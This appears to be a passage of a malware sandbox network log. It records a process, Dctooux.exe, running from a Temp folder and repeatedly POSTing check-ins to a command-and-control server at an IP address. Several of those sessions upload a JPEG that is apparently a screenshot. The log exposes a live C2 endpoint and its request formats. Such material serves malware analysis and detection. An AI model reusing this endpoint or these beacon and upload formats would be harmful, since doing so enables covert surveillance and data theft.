Apr 14, 2024 08:46:05.015356064 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Apr 14, 2024 08:46:05.015400887 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Apr 14, 2024 08:46:05.015431881 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Apr 14, 2024 08:46:05.015460968 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Apr 14, 2024 08:46:06.099427938 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49770	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:46:05.393776894 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:46:05.726213932 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:46:05.726834059 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:46:06.064234972 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49771	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:46:06.504566908 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:46:06.839978933 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:46:06.843151093 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:46:07.183656931 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49772	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:46:06.730238914 CEST	173	OUT	POST /g88sks2SaM/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----ODYzOTY= Host: 91.202.233.180 Content-Length: 86548 Cache-Control: no-cache
Apr 14, 2024 08:46:06.730372906 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 44 59 7a 4f 54 59 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------ODYzOTY=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Apr 14, 2024 08:46:06.730372906 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Apr 14, 2024 08:46:06.730396032 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Apr 14, 2024 08:46:06.730396032 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Apr 14, 2024 08:46:06.730432034 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Apr 14, 2024 08:46:06.730432034 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Apr 14, 2024 08:46:06.730462074 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Apr 14, 2024 08:46:06.730462074 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Apr 14, 2024 08:46:06.730495930 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Apr 14, 2024 08:46:06.730495930 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Apr 14, 2024 08:46:09.124723911 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49773	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:46:07.621066093 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:46:07.950439930 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:46:07.951303005 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:46:08.284332037 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49774	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:46:08.726633072 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:46:09.065865040 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:46:09.066675901 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:46:09.408601046 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49775	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:46:09.705818892 CEST	173	OUT	POST /g88sks2SaM/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----ODYzOTY= Host: 91.202.233.180 Content-Length: 86548 Cache-Control: no-cache
Apr 14, 2024 08:46:09.705857992 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 44 59 7a 4f 54 59 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------ODYzOTY=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Apr 14, 2024 08:46:09.705897093 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Apr 14, 2024 08:46:09.705918074 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Apr 14, 2024 08:46:09.705935955 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Apr 14, 2024 08:46:09.705946922 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Apr 14, 2024 08:46:09.705967903 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Apr 14, 2024 08:46:09.705986977 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Apr 14, 2024 08:46:09.706002951 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Apr 14, 2024 08:46:09.706024885 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Apr 14, 2024 08:46:09.706034899 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Apr 14, 2024 08:46:12.103760004 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49776	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:46:09.857769012 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:46:10.190109015 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:46:10.200706959 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:46:10.535772085 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49777	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:46:10.982037067 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:46:11.309335947 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:46:11.310383081 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:46:11.643269062 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49778	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:46:12.089946985 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:46:12.418833971 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:46:12.458151102 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:46:12.791479111 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49779	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:46:12.675987959 CEST	173	OUT	POST /g88sks2SaM/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----ODYzOTY= Host: 91.202.233.180 Content-Length: 86548 Cache-Control: no-cache
Apr 14, 2024 08:46:12.676309109 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 44 59 7a 4f 54 59 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------ODYzOTY=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Apr 14, 2024 08:46:12.676310062 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Apr 14, 2024 08:46:12.676310062 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Apr 14, 2024 08:46:12.676410913 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Apr 14, 2024 08:46:12.676410913 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Apr 14, 2024 08:46:12.676467896 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Apr 14, 2024 08:46:12.676541090 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Apr 14, 2024 08:46:12.676590919 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Apr 14, 2024 08:46:12.676671028 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Apr 14, 2024 08:46:12.676728964 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Apr 14, 2024 08:46:15.612390995 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49780	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:46:13.242208004 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:46:13.570709944 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:46:13.571608067 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:46:13.905659914 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49781	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:46:14.357765913 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:46:14.701167107 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:46:14.704525948 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:46:15.052094936 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49782	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:46:15.490137100 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
